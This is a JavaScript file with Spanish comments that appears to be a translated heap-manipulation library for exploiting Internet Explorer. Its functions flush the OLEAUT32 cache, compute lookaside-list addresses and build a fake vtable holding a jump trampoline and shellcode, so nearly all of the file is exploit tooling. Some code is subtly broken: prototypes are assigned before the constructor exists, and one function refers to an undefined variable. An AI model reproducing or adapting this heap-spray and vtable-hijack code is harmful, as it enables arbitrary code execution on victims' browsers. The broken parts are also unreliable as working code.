function pilaLib() {
}

pilaLib.ie.prototype.cadenaHex = function(numeroHexadecimal, anchoBytes)
{
    var digitos = "0123456789ABCDEF";
    var cadenaHexadec = digitos.substr(numeroHexadecimal & 0xF, 1);
    while (numeroHexadecimal > 0xF) {
        numeroHexadecimal = numeroHexadecimal >>> 4;
        cadenaHexadec = digitos.substr(numeroHexadecimal & 0xF, 1) + cadenaHexadec;
    }
    var anchoBytes = (anchoBytes ? anchoBytes : 0);
    while (cadenaHexadec.length < anchoBytes)
        cadenaHexadec = "0" + cadenaHexadec;
    return cadenaHexadec;
}

pilaLib.ie.prototype.direccion = function(direccion) {
    return unescape("%u" + this.cadenaHex(direccion & 0xFFFF, 4) + "%u" + this.cadenaHex((direccion >> 16) & 0xFFFF, 4));
}

pilaLib.ie.prototype.escribeInts32Bits = function(numeroBytesBloque, etiquetaBloque) {
    var tamanio;
    // Calculate the allocation size
    if (typeof numeroBytesBloque == "string" || numeroBytesBloque instanceof String)
        tamanio = 4 + numeroBytesBloque.length*2 + 2;    // len + string data + null terminator
    else
        tamanio = numeroBytesBloque;
    // Make sure that the size is valid
    if ((tamanio & 0xf) != 0)
        throw "Allocation size " + tamanio + " must be a multiple of 16";
    // Create an array for this tag if doesn't already exist
    if (this.memoria[etiquetaBloque] === undefined)
        this.memoria[etiquetaBloque] = new Array();
    if (typeof numeroBytesBloque == "string" || numeroBytesBloque instanceof String) {
        // Allocate a new block with strdup of the string argument
        this.memoria[etiquetaBloque].push(numeroBytesBloque.substr(0, numeroBytesBloque.length));
    }
    else {
        // Allocate the block
        this.memoria[etiquetaBloque].push(this.rellena((numeroBytesBloque-6)/2));
    }
}

pilaLib.ie.prototype.liberaInts32Bits = function(etiqueta) {
    delete this.memoria[etiqueta];
    
    // Run the garbage collector
    CollectGarbage();
}

pilaLib.ie.prototype.limpiaCache = function() {
    this.depur("Flushing the OLEAUT32 cache");
    // Free the maximum size blocks and push out all smaller blocks
    this.liberaInts32Bits("oleaut32");
    
    // Allocate the maximum sized blocks again, emptying the cache
    for (var i = 0; i < 6; i++) {
        this.escribeInts32Bits(32, "oleaut32");
        this.escribeInts32Bits(64, "oleaut32");
        this.escribeInts32Bits(256, "oleaut32");
        this.escribeInts32Bits(32768, "oleaut32");
    }
}

//perdemos la referencia al objeto o string, pero su contenido queda guardado en memoria y reubicado por el recol basur
pilaLib.ie.prototype.libera = function(etiqueta) {
    // Free the blocks with the OLEAUT32 free function
    this.liberaInts32Bits(etiqueta);
    // Flush the OLEAUT32 cache
    this.limpiaCache();
}

//----------------------------------------------------------
//----------------------PUBLICAS----------------------------

pilaLib.ie.prototype.recolectorBasura = function() {
	CollectGarbage();
    this.limpiaCache();
}

pilaLib.ie = function(tamanioBloqueMaximo, basePila) {
    this.tamanioBloqueMaximo = (tamanioBloqueMaximo ? tamanioBloqueMaximo : 65535);
    this.basePila = (basePila ? basePila : 0x150000);
    // Allocate a padding string that uses maxAlloc bytes
    this.textoRelleno = "AAAA";
    while (4 + this.textoRelleno.length*2 + 2 < this.tamanioBloqueMaximo) {
        this.textoRelleno += this.textoRelleno;
    }
    
    // Create an array for storing references to allocated memory
    this.memoria = new Array();
    // Call flushOleaut32() once to allocate the maximum size blocks
    this.limpiaCache();
}

pilaLib.ie.prototype.rellena = function(longitud) {
    if (longitud > this.textoRelleno.length)
        throw "Requested padding string length " + longitud + ", only " + this.textoRelleno.length + " available";
    return this.textoRelleno.substr(0, longitud);
}

//en C++ los objetos se guardan en una lista de nodos de 48 bytes que se llaman lista de tablas virtuales
pilaLib.ie.prototype.creaPunteroListaTablas = function(cadenaTablaVirtual)
{
    var tamanio;
    // Calculate the allocation size
    if (typeof cadenaTablaVirtual == "string" || cadenaTablaVirtual instanceof String)
        tamanio = 4 + cadenaTablaVirtual.length*2 + 2;    // len + string data + null terminator
    else
        tamanio = cadenaTablaVirtual;
    // Make sure that the size is valid
    if ((tamanio & 0xf) != 0)
        throw "Allocation size " + tamanio + " must be a multiple of 16";
    if (tamanio+8 >= 1024)
        throw("Maximum lookaside block tamanio is 1008 bytes");
    // The lookahead array starts at heapBase + 0x688. It contains a 48 byte
    // structure for each block size + header size in 8 byte increments.
	
	//la lista de tablas contiene paquetes, en cada uno se guarda una tabla y su cabecera aniadida de 8 bytes
	//cada paquete tiene x nodos(es su representacion en memoria).cada nodo es de 48 bytes y guarda solo un marco de su paquete
	//Un marco son 8 bytes del paquete, asi que un supuesto paquete de 16 bytes = 8tabla+8cabecera tendria dos nodos, 
	//cada uno guardaria un marco de 8bytes, el primer nodo guardaria el marco con la info de la tabla y el segundo el marco con la cabecera
	//ademas cada nodo guarda informacion extra que no nos importa(esos 40 bytes extra)
	//es decir, un paquete ocupa = tamanioTabla+8(cabecera) =  en este caso 1016bytes = tamanioPaqueteB
	//y se guarda en memoria en marcos de 8bytes, tamanioPaqueteM = tamanioPaqueteB/8 = 127 marcos
	//y estos se guardan en nodos de tamanioNodo=tamanioPaqueteM*48 = en este caso 6096 bytes
	//asi la lista de nodos ocupa = ((tamanioTabla+8)/8)*48 bytes
    return this.basePila + 0x688 + ((tamanio+8)/8)*48;
}

//crea un objeto falso con codigo ensamblador que ejecuta el codigo concha
pilaLib.ie.prototype.creaTabVirt = function(codigoConcha, direccionSaltoEjecucion, tamanio) {
    var tamanio = (tamanio ? tamanio : 1008);
    //asegura que el tamanio de la tabla es valido
    if ((tamanio & 0xf) != 0)
        throw "el tamanio de la Vtable " + tamanio + " debe ser multiplo de 16";
    if (codigoConcha.length*2 > tamanio-138)
        throw("el tamanio maximo del codigo concha es " + (tamanio-138) + " bytes");
    //Construye la tabla virtual que ira emplazada en nuestra lista tablas virtuales de bloques de 1008
    //
    //funcionSuma = add[eax]; add[eax]         funcionResta = sub[eax], al;sub[eax], al      funcionSalto=nop, nop, [exc+8]+124
    //
    // lookaside ptr  jmp +124  addr of jmp ecx  sub [eax], al*2  shellcode       null
    // 4 bytes        4 bytes   124 bytes        4 bytes          size-138 bytes  2 bytes
    // funcionSuma  funcionSalto  31xdirSalto   funcionResta  shellcode+relleno  null
    // 124bytes tienen la dir de salto 31 veces repetida y seguida
	
	// 3 funciones para ejecutar el salto: nop, nop, [exc+8]+124
    var tablaVirtual = unescape("%u9090%u7ceb")   // nop, nop, jmp + 124
    for (var i = 0; i < 124/4; i++)
        tablaVirtual += this.direccion(direccionSaltoEjecucion);
    // If the vtable is the only entry on the lookaside, the first 4 bytes will
    // be 00 00 00 00, which disassembles as two add [eax], al instructions.
    // The jmp ecx trampoline will jump back to the beginning of the vtable and
    // execute the add [eax], al instructions. We need to use two sub [eax], al
    // instructions to fix the heap.
    tablaVirtual += unescape("%u0028%u0028") +    // two sub [eax], al instructions
              codigoConcha + pila.rellena((tamanio-138)/2 - codigoConcha.length);
    return tablaVirtual;
}

//reserva memoria
pilaLib.ie.prototype.escribeEnMemoria = function(numeroBytesBloque, etiquetaBloque) {
    var tamanio;
    // Calculate the allocation size
    if (typeof numeroBytesBloque == "string" || numeroBytesBloque instanceof String)
        tamanio = 4 + numeroBytesBloque.length*2 + 2;    // len + string data + null terminator
    else
        tamanio = numeroBytesBloque;
    // Make sure that the size is valid
    if (tamanio == 32 || tamanio == 64 || tamanio == 256 || tamanio == 32768)
        throw "Allocation sizes " + tamanio + " cannot be flushed out of the OLEAUT32 cache";
    // Allocate the block with the OLEAUT32 allocator
    this.escribeInts32Bits(numeroBytesBloque, etiquetaBloque);
}

pilaLib.ie.prototype.guardaTabla = function(tabla, numBloques) {
    var tamanio;
    // Calculate the allocation size
    if (typeof tabla == "string" || tabla instanceof String)
        tamanio = 4 + tabla.length*2 + 2;    // len + string data + null terminator
    else
        tamanio = tabla;
    // Make sure that the size is valid
    if ((tamanio & 0xf) != 0)
        throw "Allocation size " + tamanio + " must be a multiple of 16";
    if (tamanio+8 >= 1024)
        throw("Maximum lookaside block size is 1008 bytes");
    var numBloques = (numBloques ? numBloques : 1);
    for (var i = 0; i < numBloques; i++)
        this.escribeEnMemoria(tabla, "tablaAliberar");
    this.libera("tablaAliberar");
}

pilaLib.ie.prototype.guardaBloqueInjector = function(contenidoBloqueInjector, numFilas) {
    var numFilas = (numFilas ? numFilas : 1);
    for (var i = 0; i < numFilas; i++) {
        this.escribeEnMemoria(contenidoBloqueInjector,"e");//relleno
        this.escribeEnMemoria(contenidoBloqueInjector, "bloqueAliberar");
    }
    this.escribeEnMemoria(contenidoBloqueInjector,"e");//relleno
    this.libera("bloqueAliberar");
}

//depura sin usar la pila de STRINGs de la RAM
pilaLib.ie.prototype.depur = function(msg) {
    void(Math.atan2(0xbabe, msg));
}

pilaLib.ie.prototype.depurar = function(enable) {
    if (enable == true)
        void(Math.atan(0xbabe));
    else
        void(Math.asin(0xbabe));
}



